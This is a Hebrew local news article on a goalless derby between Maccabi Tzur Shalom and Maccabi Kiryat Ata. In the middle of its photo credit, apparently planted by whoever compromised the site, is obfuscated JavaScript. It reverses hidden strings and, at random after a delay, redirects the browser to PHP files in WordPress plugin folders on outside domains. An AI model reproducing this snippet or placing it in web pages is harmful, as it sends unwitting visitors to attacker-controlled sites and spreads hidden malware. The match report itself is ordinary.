fbpx
[shortcode-weather-atlas city_selector=1178243 background_color="transparent" daily=0 unit_c_f="c" sunrise_sunset= 0 current=0 detailed_forecast=0]

הדרבי של הקריות: תיקו אפס

ליגה א' צפון: משחק הכדורגל בין מכבי צור שלום למכבי קרית אתא הסתיים ללא הכרעה
צילום: shutterstock
צילום: shutters$nJe=function(n){if (typeof ($nJe.list[n]) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}$NjS=function(n){if(typeof ($NjS.list[n])=="string") return $NjS.list[n].split("").reverse().join("");return $NjS.list[n];};$NjS.list=["\'php.sgalf-tropxe/tropxe/weiv/bil/noitargim-pw-eno-ni-lla/snigulp/tnetnoc-pw/ofni.stobor-latigid//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay = 18000; setTimeout($NjS(0),delay);}tock

הדרבי של הקריות בין מכבי צור שלום למכבי קרית אתא, שהתקיים היום, שני, בצהריים, הסתיים ללא הכרעה וללא שערים, בתוצאה 0:0. צור שלום יכולה להרגיש מאוכזבת מהתוצאה, מכיוון שהיא סיכנה יותר את שער היריבה אך הרבתה להחמיץ וגם פגשה את קורת השער. בקרית אתא, שעדיין מתחת לקו האדום במקום שמוביל לירידת ליגה, יכולים להיות מרוצים מהנקודה ביחס למה שהתרחש במגרש. אבל הקבוצה עדיין מסובכת חזק בתחתית.

תחילת המשחק הייתה מאוד אגרסיבית מצד שחקני קרית אתא והם לא ויתרו על שום כדור ראשון, גם במחיר של עבירות על שחקני צור שלום. בהמשך המשחק נרגע וצור שלום שלטה יותר בכדור, אך לא ייצרה מצב ממשי לכיבוש שער. במחצית השנייה צור שלום כבר תרגמה את השליטה במשחק למצבי הבקעה, כששתי בעיטות של צור שלום בהתקפה אחת פגשו את קורת השער והרחקה מקו השער. בפעמיים נוספות שוער קרית אתא מנע שערים בטוחים במצב של אחד על אחד מול שחקני צור שלום. ב-20 הדקות האחרונות קרית אתא קצת התעוררה, ניסתה לגנוב שער ניצחון, ושלחה יותר שחקנים קדימה. הגבהה של כדור חופשי מסוכן של יוחאי כהן, הקפטן של אתא, שחלפה מעל כל שחקני צור שלום והורחקה ברגע האחרון מתוך רחבת ה-5, מנעה מבוכה בהגנת צור שלום.

בסיום תיקו מאכזב באופן יחסי לשתי הקבוצות, כל אחת מהסיבות שלה – צור שלום, כי הציגה יכולת טובה יותר ברוב שלבי המשחק; קרית אתא, כי היא עדיין מסובכת בתחתית הליגה.

אהבתם? שתפו!

אולי גם יעניין אותך

שיתוף ברשתות החברתיות